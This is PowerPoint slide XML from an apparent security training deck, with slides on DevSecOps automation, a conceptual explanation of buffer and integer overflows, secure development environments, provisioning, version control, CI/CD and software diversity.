              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4A10495-EAE9-43CB-A76E-81AFBC5B8BCB}"/>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id="{AF398DA8-FCB2-4046-8C4B-00502E4B5B81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3299374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7CAB59-2E4C-4024-9B6D-2FB3F6495EBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DevSecOps and requirements for greater automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Completion of tasks without human intervention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automation facilitates better scalability and elasticity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Scalability means that the costs involved in supplying the service to more users are linear</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Elasticity refers to the system's ability to handle changes on demand in real time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8663F7B7-13BB-4F7E-871D-0BBC060F5E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Application Development, Deployment, and Automation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D91C9B8-603D-4244-973C-62595ADCCCAE}"/>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id="{B79F5535-A147-491B-9A01-126646CF1022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296214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Overflow Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6282E578-85AA-4FC4-BADB-DC224E4CFF43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36576" y="841249"/>
            <a:ext cx="9227602" cy="3503984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Buffer is memory allocated to application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The threat actor submits input that is too large to be stored in a variable assigned by the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the buffer. One of the most common vulnerabilities is a stack overflow. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Integer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Cause application to calculate values that are out-of-bounds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Could use to cause crash or use in buffer overflow attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>An integer overflow attack causes the target software to calculate a value that exceeds these bounds. This may cause a positive number to become negative (changing a bank debit to a credit)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB0A74C6-DD13-44A2-B828-B23137F62E09}"/>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id="{C9E1747A-6110-4928-8BD1-93BEAAC1B52C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="485505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C5D51F-89DB-4325-8AE2-D2C24D3DD581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Secure Application Development Environments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="A picture containing bird&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D6B7F7-3B04-41D3-BFC0-B003B81B6BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="125652" y="1094418"/>
            <a:ext cx="5110582" cy="3328266"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA22C2AE-1778-41DD-8793-F77C4F7696F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236234" y="968991"/>
            <a:ext cx="3907766" cy="3900632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Software development life cycle (SDLC) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Waterfall and Agile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quality assurance (QA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Development environments</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Preserving environment integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Sandboxing </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Secure baseline </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Integrity measurement </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB360EC-86A8-4133-ADBA-12550ED62375}"/>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id="{A3CCC6A3-E8B0-40C2-9664-6B864518E83F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E81225-CAA5-40A0-A5D0-B8754B0A07A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26732" y="4378460"/>
            <a:ext cx="1285929" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Images © 123rf.com.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1312958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A614B6-50BF-4D57-B208-D814328B4DBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Provisioning, Deprovisioning, and Version Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C399C78-81B4-44CC-B554-35CD959704DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Provisioning is the process of deploying an application to the target environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Installer/setup package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Instance (VM with OS and application)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Deprovisioning is the process of removing an application from packages or instances </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Version control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Customer version ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Developer build ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Source code version control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Code commits and backups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD9DB98-F4FB-4B0D-A56E-23AA7EEE02DB}"/>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id="{EF7A2DB1-716B-4D99-BDBD-9CF4E13233DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2122701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A614B6-50BF-4D57-B208-D814328B4DBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automation/Scripting Release Paradigms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C399C78-81B4-44CC-B554-35CD959704DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341927" y="968991"/>
            <a:ext cx="4153873" cy="3985094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Waterfall versus Agile SDLCs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Continuous integration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Commit updates often</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reduce commit conflicts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Continuous delivery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Push updates to staging infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Continuous deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Push updated code to production</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Continuous monitoring and automated courses of action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Continuous validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7277A1EC-5FEF-44D0-805A-F8D1FC5FCD6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4287328" y="792506"/>
            <a:ext cx="4816812" cy="4077733"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C40336F5-D2D0-479A-A8C6-B2E5809F0A21}"/>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id="{0E0CDF67-542E-4242-A8B1-43666F9353E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0162B992-27DC-4C3B-9CBC-D1D9E5168154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7914937" y="635167"/>
            <a:ext cx="1285929" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Images © 123rf.com.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1805495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88B30-3B0E-4C78-83C5-EC7B08918BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Diversity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29466890-DD9D-40AE-AFB4-C12EED108594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runtime environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compiled code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interpreted code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software diversity as obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security by diversity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid monocultures to make attacks harder to develop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{444EE5D2-5378-450D-832A-98446A3825D7}"/>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id="{70FF48ED-7444-4523-8CB5-D0A265B70F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
